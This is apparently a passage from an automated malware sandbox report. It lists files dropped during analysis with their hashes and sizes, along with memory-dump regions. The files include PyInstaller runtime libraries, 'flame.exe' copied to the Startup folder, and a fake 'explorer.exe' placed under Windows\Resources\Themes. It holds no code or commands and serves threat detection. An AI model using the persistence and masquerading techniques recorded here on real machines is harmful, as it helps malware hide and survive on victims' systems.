                    SHA1

                    0e49d745643f6b0a7d15ea12b6a1fe053c829b30

                    SHA256

                    bfc8ad242bf673bf9024b5bbe4158ca6a4b7bdb45760ae9d56b52965440501bd

                    SHA512

                    f1af074cce2a9c3a92e3a211223e05596506e7874ede5a06c8c580e002439d102397f2446ce12cc69c38d5143091443833820b902bb07d990654ce9d14e0a7f0

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\api-ms-win-crt-process-l1-1-0.dll

                    Filesize

                    21KB

                    MD5

                    ad586ea6ac80ac6309421deeea701d2f

                    SHA1

                    bc2419dff19a9ab3c555bc00832c7074ec2d9186

                    SHA256

                    39e363c47d4d45beda156cb363c5241083b38c395e4be237f3cfeda55176453c

                    SHA512

                    15c17cba6e73e2e2adb0e85af8ed3c0b71d37d4613d561ce0e818bdb2ca16862253b3cb291e0cf2475cedcb7ce9f7b4d66752817f61cf11c512869ef8dabc92a

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\api-ms-win-crt-runtime-l1-1-0.dll

                    Filesize

                    25KB

                    MD5

                    3ae4741db3ddbcb205c6acbbae234036

                    SHA1

                    5026c734dcee219f73d291732722691a02c414f2

                    SHA256

                    c26540e3099fa91356ee69f5058cf7b8aee63e23d6b58385476d1883e99033c3

                    SHA512

                    9dd5e12265da0f40e3c1432fb25fd19be594684283e961a2eaffd87048d4f892d075dcd049ab08aeee582542e795a0d124b490d321d7beb7963fd778ef209929

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\api-ms-win-crt-stdio-l1-1-0.dll

                    Filesize

                    25KB

                    MD5

                    9a7e2a550c64dabff61dad8d1574c79a

                    SHA1

                    8908de9d45f76764140687389bfaed7711855a2d

                    SHA256

                    db059947ace80d2c801f684a38d90fd0292bdaa1c124cd76467da7c4329a8a32

                    SHA512

                    70a6eb10a3c3bad45ba99803117e589bda741ecbb8bbdd2420a5ae981003aebe21e28cb437c177a3b23f057f299f85af7577fec9693d59a1359e5ffc1e8eaabd

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\api-ms-win-crt-string-l1-1-0.dll

                    Filesize

                    25KB

                    MD5

                    cf115db7dcf92a69cb4fd6e2ae42fed5

                    SHA1

                    b39aa5eca6be3f90b71dc37a5ecf286e3ddca09a

                    SHA256

                    eb8fe2778c54213aa2cc14ab8cec89ebd062e18b3e24968aca57e1f344588e74

                    SHA512

                    8abd2754171c90bbd37ca8dfc3db6edaf57ccdd9bc4ce82aef702a5ce8bc9e36b593dc863d9a2abd3b713a2f0693b04e52867b51cd578977a4a9fde175dba97a

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\api-ms-win-crt-time-l1-1-0.dll

                    Filesize

                    21KB

                    MD5

                    82e6d4ff7887b58206199e6e4be0feaf

                    SHA1

                    943e42c95562682c99a7ed3058ea734e118b0c44

                    SHA256

                    fb425bf6d7eb8202acd10f3fbd5d878ab045502b6c928ebf39e691e2b1961454

                    SHA512

                    ff774295c68bfa6b3c00a1e05251396406dee1927c16d4e99f4514c15ae674fd7ac5cadfe9bfffef764209c94048b107e70ac7614f6a8db453a9ce03a3db12e0

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\api-ms-win-crt-utility-l1-1-0.dll

                    Filesize

                    21KB

                    MD5

                    9a3b4e5b18a946d6954f61673576fa11

                    SHA1

                    74206258cfd864f08e26ea3081d66297221b1d52

                    SHA256

                    ce74a264803d3e5761ed2c364e2196ac1b391cb24029af24aee8ef537ec68738

                    SHA512

                    da21178f2e7f4b15c28ae7cb0cc5891eaa3bdd0192042965861c729839983c7dcba9cfb96930b52dbe8a592b4713aa40762e54d846b8135456a09ae5bacbb727

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\base_library.zip

                    Filesize

                    752KB

                    MD5

                    558fab87ca04dfcdbd86b9a6f5b19fef

                    SHA1

                    fbb822f8f5a43a260285a4d13930228e3545aa08

                    SHA256

                    04eead293b9019f3cafab9c202a50324396d9b960efbeafa04942b76e247ad91

                    SHA512

                    e1da15a76691450aff558400f55bb534848c257dac2ca725e7eb4334fd5d7d19a23b2a2abae86fef93945b77cd8053330d76bfd6284cf90ea0e0778aae58ecfc

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\libcrypto-3.dll

                    Filesize

                    3.0MB

                    MD5

                    23e8a95056efbaab4a8dee287d89cd4c

                    SHA1

                    7479b90a20f1fa86d95331680587159318b27617

                    SHA256

                    99e851132d72646efc8482d471678c0e8446dbaf973976d7d2f61455aee30c1b

                    SHA512

                    f2c25790e0d01612c543c6d2fa6989ddb543d195272a12f997e084e18ad9ef346446c443a6734b454843699a34f14a1ff9f7e25aae6cd365eba79f513e7e839d

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\libffi-8.dll

                    Filesize

                    38KB

                    MD5

                    0f8e4992ca92baaf54cc0b43aaccce21

                    SHA1

                    c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                    SHA256

                    eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                    SHA512

                    6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\libssl-3.dll

                    Filesize

                    768KB

                    MD5

                    19a2aba25456181d5fb572d88ac0e73e

                    SHA1

                    656ca8cdfc9c3a6379536e2027e93408851483db

                    SHA256

                    2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006

                    SHA512

                    df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\pyexpat.pyd

                    Filesize

                    194KB

                    MD5

                    f179c9bdd86a2a218a5bf9f0f1cf6cd9

                    SHA1

                    4544fb23d56cc76338e7f71f12f58c5fe89d0d76

                    SHA256

                    c42874e2cf034fb5034f0be35f7592b8a96e8903218da42e6650c504a85b37cc

                    SHA512

                    3464ece5c6a0e95ef6136897b70a96c69e552d28bfedd266f13eec840e36ec2286a1fb8973b212317de6fe3e93d7d7cc782eb6fc3d6a2a8f006b34f6443498de

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\python3.DLL

                    Filesize

                    66KB

                    MD5

                    6271a2fe61978ca93e60588b6b63deb2

                    SHA1

                    be26455750789083865fe91e2b7a1ba1b457efb8

                    SHA256

                    a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb

                    SHA512

                    8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\python312.dll

                    Filesize

                    2.8MB

                    MD5

                    7a9a5ce55769dd295d3d9fb79ad2a3b9

                    SHA1

                    3c39f8e4e81fa769646dd09cbe16d0ba190d046f

                    SHA256

                    d5ce87eaf3729a7cd8e73a48b45b2cf359934a992fea129e1aad4523f16972d5

                    SHA512

                    ef68f80a1a18100e5a1a65d6a1fa811ebc4cda99c5c33ef53492f0c4382d5a0644f2f6a9cb6c6233f1ad6ff964e27ee17f21e9f8ba808cf32a9a0a4a07c1d5d0

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\python312.dll

                    Filesize

                    1.1MB

                    MD5

                    e46d3c69a3c838d2cc644d7fb5159c4a

                    SHA1

                    4e0c428e1a82d0f39ac5d4843a042c59f0e6d5c0

                    SHA256

                    145c9b6b79339203dfd68c32a8de7a284e8333d65ad741922e0f08d051729591

                    SHA512

                    08271105b2c85fe5366c1d18ad1246313717853d37aa3402f4faa662e0956378f0d29e40adff9a145ad07497901dd968d30376096ac14b8d6ba1a0850167eca0

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\select.pyd

                    Filesize

                    29KB

                    MD5

                    8a273f518973801f3c63d92ad726ec03

                    SHA1

                    069fc26b9bd0f6ea3f9b3821ad7c812fd94b021f

                    SHA256

                    af358285a7450de6e2e5e7ff074f964d6a257fb41d9eb750146e03c7dda503ca

                    SHA512

                    7fedae0573ecb3946ede7d0b809a98acad3d4c95d6c531a40e51a31bdb035badc9f416d8aaa26463784ff2c5e7a0cc2c793d62b5fdb2b8e9fad357f93d3a65f8

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\sqlite3.dll

                    Filesize

                    1.4MB

                    MD5

                    c1161c1cec57c5fff89d10b62a8e2c3a

                    SHA1

                    c4f5dea84a295ec3ff10307a0ea3ba8d150be235

                    SHA256

                    d1fd3040acddf6551540c2be6ff2e3738f7bd4dfd73f0e90a9400ff784dd15e6

                    SHA512

                    d545a6dc30f1d343edf193972833c4c69498dc4ea67278c996426e092834cb6d814ce98e1636c485f9b1c47ad5c68d6f432e304cd93ceed0e1e14feaf39b104a

                  • C:\Users\Admin\AppData\Local\Temp\_MEI11562\ucrtbase.dll

                    Filesize

                    992KB

                    MD5

                    0e0bac3d1dcc1833eae4e3e4cf83c4ef

                    SHA1

                    4189f4459c54e69c6d3155a82524bda7549a75a6

                    SHA256

                    8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

                    SHA512

                    a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

                  • C:\Users\Admin\AppData\Local\Temp\flame.exe 

                    Filesize

                    2.8MB

                    MD5

                    14f7462ed442a405c6c6930dace61680

                    SHA1

                    a806f1ae2d2eade35ebb1122de20b15fa4436589

                    SHA256

                    e218043ddb572b7799b61f5096ef5228e2aaad25e0b002fcd07b9f5e113b7b98

                    SHA512

                    bbf9eef69684c29ed9070c9368f9911f74b3e5e0fdcf51f26cee38089d5b36442cab8b4e627c9ca8a848e85a2f22b42b59b67b6a621ea721d853976bfb9c3d2f

                  • C:\Users\Admin\AppData\Local\Temp\flame.exe 

                    Filesize

                    957KB

                    MD5

                    b79d9a132673ca6044c8e414669f0047

                    SHA1

                    6f0b2b1a595d49730f0f169539ff2283f1208855

                    SHA256

                    b451af723fadcf84cfa1303d0cba50ccfe3dcdf6026a22c7d3ee140b94ab9b4c

                    SHA512

                    98a6f3fb69f5e3c091babef652037fed483c28dfa20a96d795f212badec62119f7dca6696eac35f87c9c45a7d779629c348065c490382acd569a6c82aaae08f2

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\flame.exe 

                    Filesize

                    2.2MB

                    MD5

                    11b6071f4adaa17c5a49629d98cd9d14

                    SHA1

                    26b25244ca19e1b2758b6a1a46efca6cc501e3fd

                    SHA256

                    f0d5ae2fc0f762212e0debfe73677766231b91d2b7521925041ec300ebcf5daa

                    SHA512

                    650382fa26fafa163cf59877326488bf60d3c27bb23c0cd576bdb56827f94fb89f2b86342996f4374fb6b34e1e2131f581b7745a232aba07f89722cbc24dd9f3

                  • C:\Windows\Resources\Themes\explorer.exe

                    Filesize

                    135KB

                    MD5

                    07c4085f926b4027bba809a894aaa095

                    SHA1

                    3f30e4a715727497db00c6866e70f19832350e86

                    SHA256

                    899a7adb349b73400bf26dc62ead9c535bec90bd5fdad0efc01f0cec5a78a5a5

                    SHA512

                    c283240306d55c6eacea83d9c8c689870a9496c8dcc36cacef45cc6c09501a1933de778fdc1d3527051682700f9645f03c103d4b3ef8b5399474fb1610b80d7e

                  • \??\c:\users\admin\appdata\local\temp\flame.exe 

                    Filesize

                    214KB

                    MD5

                    27ff595fab6d0bace8af690efc82273d

                    SHA1

                    80e6b4f78aa334c80e86e7adb3dad54c07d472d7

                    SHA256

                    2a3472a6a50020bff7751104283a06c31c5747a2615a777f542279801e5a7047

                    SHA512

                    1245ddd9497eaf206aa7b6f021333864cdf6624749827aecd4cd85b71ac76beea1d4e35613c40cd1c973a46a211c365d13e4c28a892ad8584c8dedd13a578259

                  • memory/820-233-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/1196-308-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/1388-232-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/2204-319-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/2420-297-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/2448-309-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/2872-320-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/3332-192-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-200-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-191-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-203-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-202-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-193-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-201-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-199-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-197-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3332-198-0x0000028D0CB60000-0x0000028D0CB61000-memory.dmp

                    Filesize

                    4KB

                  • memory/3424-234-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/3424-0-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/4684-236-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/4684-205-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB

                  • memory/5012-307-0x0000000000400000-0x000000000041F000-memory.dmp

                    Filesize

                    124KB